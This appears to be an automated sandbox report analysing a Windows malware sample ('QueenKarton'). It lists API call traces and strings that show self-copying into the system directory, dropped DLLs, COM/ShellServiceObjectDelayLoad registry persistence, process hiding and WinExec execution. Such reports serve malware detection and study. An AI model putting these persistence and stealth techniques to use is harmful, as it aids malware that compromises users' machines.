3078 404cd1 strcat 3074->3078 3079 404ce4 rand 3074->3079 3075->3070 3076 404a4b sprintf rand 3075->3076 3077 4049d9 sprintf 3075->3077 3080 404a82 strcat 3076->3080 3081 404a95 rand 3076->3081 3077->3075 3078->3079 3083 404cf6 strcat 3079->3083 3084 404d09 strcat rand 3079->3084 3080->3081 3085 404aa7 strcat 3081->3085 3086 404aba rand 3081->3086 3082 404b47 sprintf 3082->3096 3083->3084 3087 404d34 rand sprintf 3084->3087 3088 404d57 rand 3084->3088 3085->3086 3086->3075 3089 404acc strcat 3086->3089 3087->3088 3090 404d69 strcat 3088->3090 3091 404d7c rand 3088->3091 3089->3075 3090->3091 3092 404da1 rand 3091->3092 3093 404d8e strcat 3091->3093 3094 404db9 strcat 3092->3094 3095 404dcc rand 3092->3095 3093->3092 3094->3095 3097 404e01 strcat rand 3095->3097 3098 404dde rand sprintf 3095->3098 3096->3071 3096->3072 3096->3082 3123 40447a lstrlenA LocalAlloc 3096->3123 3100 404e2c strcat 3097->3100 3101 404e3f strcat rand 3097->3101 3098->3097 3100->3101 3103 404e64 strcat 3101->3103 3104 404e77 strcat rand 3101->3104 3103->3104 3107 404ea2 strcat 3104->3107 3108 404eb5 sprintf rand 3104->3108 3105 404c02 rand 3109 404c14 strcat 3105->3109 3110 404c27 rand 3105->3110 3106 404bef strcat 3106->3105 3107->3108 3113 404ee3 strcat 3108->3113 3114 404ef6 strcat rand 3108->3114 3109->3110 3111 404c39 strcat 3110->3111 3112 404c4c LocalFree 3110->3112 3111->3112 3112->3096 3113->3114 3115 404f27 strcat 3114->3115 3116 404f3a rand sprintf rand 3114->3116 3115->3116 3117 404f77 strcat 3116->3117 3118 404f8a strcat rand 3116->3118 3117->3118 3119 404fb5 strcat 3118->3119 3120 404fc8 rand 3118->3120 3119->3120 3121 404fda rand sprintf 3120->3121 3122 404ffd 7 API calls 3120->3122 3121->3122 3122->3034 3124 4044b6 3123->3124 3125 4044d9 sprintf 3124->3125 3126 40452a sprintf rand 3124->3126 3125->3124 3126->3105 3126->3106 3127 401b33 3130 401aa4 3127->3130 3128 401b13 3129 401ae6 sprintf 3132 40129c 3129->3132 3130->3128 3130->3129 3133 4012a9 CreateFileA 3132->3133 3134 4079e4 3132->3134 3135 4012d7 3133->3135 3136 4012db ReadFile CloseHandle 3133->3136 3134->3133 3135->3128 3136->3135 3137 4036b3 CreateFileA 3138 4036e7 SetFilePointer 3137->3138 3139 4036e3 3137->3139 3140 403701 3138->3140 3140->3140 3141 403708 WriteFile WriteFile CloseHandle 3140->3141 3141->3139 2747 406ff6 2748 4071a4 2747->2748 2749 40701f 2747->2749 2750 40717e 2748->2750 2751 4071be DestroyWindow 2748->2751 2752 407021 2749->2752 2753 40702f 2749->2753 2751->2750 2756 407184 2752->2756 2757 40702a 2752->2757 2754 407289 GetWindowTextA 2753->2754 2755 40703a 2753->2755 2761 4072c9 GetWindowTextA 2754->2761 2762 4072a9 MessageBoxA SetFocus 2754->2762 2759 407041 2755->2759 2760 40705c 2755->2760 2756->2750 2763 407198 PostQuitMessage 2756->2763 2758 4077cc DefWindowProcA 2757->2758 2758->2750 2759->2757 2759->2758 2767 4071cb 2759->2767 2766 407149 2760->2766 2803 405ffa 2760->2803 2764 407322 2761->2764 2765 407302 MessageBoxA SetFocus 2761->2765 2762->2750 2763->2750 2771 407337 MessageBoxA SetFocus 2764->2771 2781 407357 2764->2781 2765->2750 2766->2750 2810 406075 2766->2810 2767->2750 2773 407224 SetTextColor 2767->2773 2776 407233 SetTextColor 2767->2776 2771->2750 2772 405ffa 3 API calls 2775 40709b GetWindowRect 2772->2775 2774 40723d SetBkColor CreateBrushIndirect 2773->2774 2774->2750 2775->2766 2778 4070be GetWindowRect 2775->2778 2776->2774 2777 4073a7 sprintf GetWindowTextA 2779 40740f sprintf GetWindowTextA 2777->2779 2780 4073ef MessageBoxA SetFocus 2777->2780 2778->2766 2783 4070d4 2778->2783 2784 407477 sprintf GetWindowTextA 2779->2784 2785 407457 MessageBoxA SetFocus 2779->2785 2780->2750 2781->2777 2782 407376 MessageBoxA SetFocus 2781->2782 2782->2750 2783->2766 2786 407112 MoveWindow 2783->2786 2787 4074d9 2784->2787 2788 4074b9 MessageBoxA SetFocus 2784->2788 2785->2750 2786->2766 2789 4074ee MessageBoxA SetFocus 2787->2789 2792 40750e 2787->2792 2788->2750 2789->2750 2790 40755e sprintf GetWindowTextA 2791 4075a6 MessageBoxA SetFocus 2790->2791 2794 4075c6 2790->2794 2791->2750 2792->2790 2793 40752d MessageBoxA SetFocus 2792->2793 2793->2750 2795 407627 sprintf CreateFileA SetFilePointer 2794->2795 2796 4075e5 MessageBoxA SetFocus 2794->2796 2797 40768e 2795->2797 2796->2750 2797->2797 2798 407695 WriteFile WriteFile 2797->2798 2799 4076db 2798->2799 2799->2799 2800 4076e2 6 API calls 2799->2800 2801 40776e 2800->2801 2801->2801 2802 407775 WriteFile WriteFile CloseHandle ShowWindow 2801->2802 2802->2750 2804 4079e4 2803->2804 2805 406007 GetWindow 2804->2805 2806 406020 2805->2806 2807 406024 2806->2807 2808 406028 GetClassNameA 2806->2808 2809 40605f GetWindow 2806->2809 2807->2772 2808->2806 2809->2806 2811 405ffa 3 API calls 2810->2811 2812 406096 2811->2812 2813 405ffa 3 API calls 2812->2813 2814 4060a3 10 API calls 2813->2814 2815 406224 SendMessageA 2814->2815 2816 40623a SendMessageA 2814->2816 2817 40624e CreateWindowExA CreateWindowExA 2815->2817 2816->2817 2818 406333 2817->2818 2819 4062cb sprintf SendMessageA sprintf SendMessageA 2818->2819 2820 40633c 34 API calls 2818->2820 2819->2818 2820->2750 2957 401219 2958 40121f __GetMainArgs 2957->2958 2959 407980 173 API calls 2958->2959 2960 401284 exit 2959->2960 2961 40109a 2969 40109b 2961->2969 2962 40117f 2963 40118e signal 2962->2963 2964 4011a8 signal 2963->2964 2965 4011c9 2963->2965 2964->2965 2966 40117b 2964->2966 2965->2966 2967 4011ce signal raise 2965->2967 2967->2966 2969->2962 2969->2963 2969->2966 2970 40107a RtlUnwind 2969->2970 2970->2969 2821 40237b 2822 402333 _sleep 2821->2822 2823 402355 2821->2823 2824 401b9f 23 API calls 2822->2824 2825 40234c 2824->2825 2825->2822 2825->2823 2971 40109b 2972 4010c3 2971->2972 2973 40117f 2971->2973 2974 40118e signal 2972->2974 2978 40117b 2972->2978 2980 40107a RtlUnwind 2972->2980 2973->2974 2975 4011a8 signal 2974->2975 2976 4011c9 2974->2976 2975->2976 2975->2978 2977 4011ce signal raise 2976->2977 2976->2978 2977->2978 2980->2972 2981 40129b 2982 4079e4 2981->2982 2983 4012a9 CreateFileA 2982->2983 2984 4012db ReadFile CloseHandle 2983->2984 2985 4012d7 2983->2985 2984->2985 2697 40365e 2698 403664 GetFileSize LocalAlloc 2697->2698 2699 403684 ReadFile CloseHandle 2698->2699 2701 4036ae 2699->2701 2516 40121f __GetMainArgs 2519 407980 GetCommandLineA 2516->2519 2520 407991 strchr 2519->2520 2523 4079a6 2519->2523 2521 4079cf GetModuleHandleA 2520->2521 2520->2523 2525 406c29 OpenMutexA 2521->2525 2523->2521 2526 406c6d GetVersionExA GetSystemDirectoryA GetTickCount srand GetModuleFileNameA 2525->2526 2527 406c5f CloseHandle exit 2525->2527 2528 406cd6 2526->2528 2527->2526 2529 406ce4 rand 2528->2529 2530 406e07 9 API calls 2528->2530 2532 406d5f 2529->2532 2572 402e06 2530->2572 2534 406d69 rand 2532->2534 2535 406d2f rand 2532->2535 2538 406d8a sprintf CopyFileA 2534->2538 2539 406d7c 2534->2539 2535->2532 2536 406f65 2588 4023a7 CreateThread CloseHandle 2536->2588 2537 406f2d GetModuleHandleA GetProcAddress GetCurrentProcessId 2537->2536 2549 403ce9 rand 2538->2549 2539->2538 2543 406f6a CreateThread CloseHandle CreateThread CloseHandle SetTimer 2545 406fdc GetMessageA 2543->2545 2640 4068b0 2543->2640 2658 40682b 2543->2658 2547 406fc4 TranslateMessage DispatchMessageA 2545->2547 2548 401284 exit 2545->2548 2547->2545 2550 403d27 2549->2550 2551 403d2e 2549->2551 2560 403f68 rand 2550->2560 2589 403619 CreateFileA 2551->2589 2554 403d47 memcpy memset 2555 403da1 rand rand rand rand memcpy 2554->2555 2557 403e64 2555->2557 2595 403bbe 2557->2595 2561 404002 2560->2561 2562 403fd4 rand 2561->2562 2563 404009 rand 2561->2563 2562->2561 2564 40402a 6 API calls 2563->2564 2565 40401c 2563->2565 2600 404148 RegCreateKeyExA 2564->2600 2565->2564 2567 4040f5 2568 404148 3 API calls 2567->2568 2569 404125 2568->2569 2570 404148 3 API calls 2569->2570 2571 40413a WinExec ExitProcess 2570->2571 2573 402e13 2572->2573 2603 402822 6 API calls 2573->2603 2575 402e1b GetVersion 2576 402e2e 2575->2576 2577 402e79 LoadLibraryA GetProcAddress 2576->2577 2587 402ef6 2576->2587 2577->2576 2578 4033ce GetVersion 2578->2536 2578->2537 2580 4030e5 GetModuleHandleA 2580->2587 2581 40314c VirtualQuery 2582 4031b1 IsBadWritePtr 2581->2582 2581->2587 2582->2587 2583 402f98 GlobalMemoryStatus 2583->2587 2584 402f6f IsBadReadPtr 2584->2587 2585 403059 CloseHandle 2585->2587 2587->2578 2587->2580 2587->2581 2587->2583 2587->2584 2587->2585 2604 40289a 2587->2604 2608 402cd7 2587->2608 2588->2543 2617 4022ee 2588->2617 2590 403664 GetFileSize LocalAlloc 2589->2590 2591 40364e 2589->2591 2592 403684 ReadFile CloseHandle 2590->2592 2591->2590 2594 4036ae 2591->2594 2592->2594 2594->2550 2594->2554 2597 403bfd 2595->2597 2596 403ce4 CreateFileA WriteFile CloseHandle LocalFree 2596->2550 2597->2596 2598 403c20 rand 2597->2598 2599 403c80 memset memcpy memcpy 2597->2599 2598->2597 2599->2597 2601 404193 2600->2601 2601->2601 2602 40419a RegSetValueExA RegCloseKey 2601->2602 2602->2567 2603->2575 2605 4028c6 GetSecurityInfo SetEntriesInAclA SetSecurityInfo CloseHandle 2604->2605 2607 4029cd 2605->2607 2607->2587 2609 402ceb 2608->2609 2611 402d13 2609->2611 2612 402a72 2609->2612 2611->2587 2615 402a89 2612->2615 2613 402cd2 2613->2611 2614 402b2a GetModuleHandleA GetProcAddress 2614->2615 2615->2613 2615->2614 2616 402cad GetCurrentProcessId 2615->2616 2616->2615 2618 402333 _sleep 2617->2618 2622 401b9f 2618->2622 2638 4079e4 2622->2638 2639 4079e5 2638->2639 2639->2639 2646 4068c7 2640->2646 2642 406c0c _sleep 2642->2646 2643 403619 5 API calls 2643->2646 2645 406c01 LocalFree 2645->2642 2646->2642 2646->2643 2646->2645 2647 406941 sscanf 2646->2647 2649 406a84 atoi 2646->2649 2650 4069a4 sprintf sprintf 2646->2650 2651 4069db GetWindowsDirectoryA sprintf strcat 2646->2651 2654 406add lstrlenA 2646->2654 2655 406b20 sprintf lstrlenA lstrlenA LocalAlloc 2646->2655 2656 406b9b lstrlenA 2646->2656 2657 406bbe CreateThread CloseHandle 2646->2657 2662 405f5b lstrlenA lstrlenA LocalAlloc 2646->2662 2667 4043bf 2646->2667 2647->2646 2648 406972 rand 2647->2648 2648->2646 2649->2646 2652 406aad sprintf 2649->2652 2653 406a27 DeleteFileA sprintf WinExec 2650->2653 2651->2653 2652->2646 2653->2646 2654->2646 2655->2646 2656->2646 2657->2646 2659 40683b 2658->2659 2675 406753 CreateFileA 2659->2675 2673 407a04 2662->2673 2664 405f9b lstrlenA 2674 407a04 2664->2674 2666 405fb4 DeleteUrlCacheEntry CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2666->2646 2668 4043dc 2667->2668 2669 40441a 2668->2669 2671 4043e2 memcpy 2668->2671 2670 404441 lstrlenA 2669->2670 2672 40442f 2669->2672 2670->2672 2671->2672 2672->2646 2673->2664 2674->2666 2676 40678f GetFileSize CloseHandle 2675->2676 2682 40681a _sleep 2675->2682 2683 4013cc RegOpenKeyExA 2676->2683 2682->2659 2684 4013fa 2683->2684 2685 4013fe RegQueryValueExA RegCloseKey 2683->2685 2684->2682 2686 4054d7 6 API calls 2684->2686 2685->2684 2687 405586 2686->2687 2688 4055ce CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2687->2688 2689 40560e 2688->2689 2689->2682 2690 401348 RegCreateKeyExA 2689->2690 2691 40138a RegSetValueExA RegCloseKey 2690->2691 2692 401386 2690->2692 2691->2692 2692->2682

                            Executed Functions

                            Function 00406C29 Relevance: 82.5, APIs: 36, Strings: 11, Instructions: 264windowthreadregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE
                            Function 00403619 Relevance: 7.6, APIs: 5, Instructions: 58filememoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 60 403619-40364c CreateFileA 61 403664-403682 GetFileSize LocalAlloc 60->61 62 40364e-403652 60->62 63 403684-40368a 61->63 64 40368c-40368f 61->64 65 403654-403657 62->65 66 40365a-40365c 62->66 67 403692-4036ab ReadFile CloseHandle 63->67 64->67 65->66 66->61 68 4036ae-4036b2 66->68 67->68
                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D
                            Function 00403F68 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 135fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Olijjb32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Olijjb32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Olijjb32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Olijjb32,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Olijjb32$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-378643607
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69
                            Function 00403CE9 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 197COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD
                            Function 00404148 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 69 404148-404190 RegCreateKeyExA 70 404193-404198 69->70 70->70 71 40419a-4041c2 RegSetValueExA RegCloseKey 70->71
                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
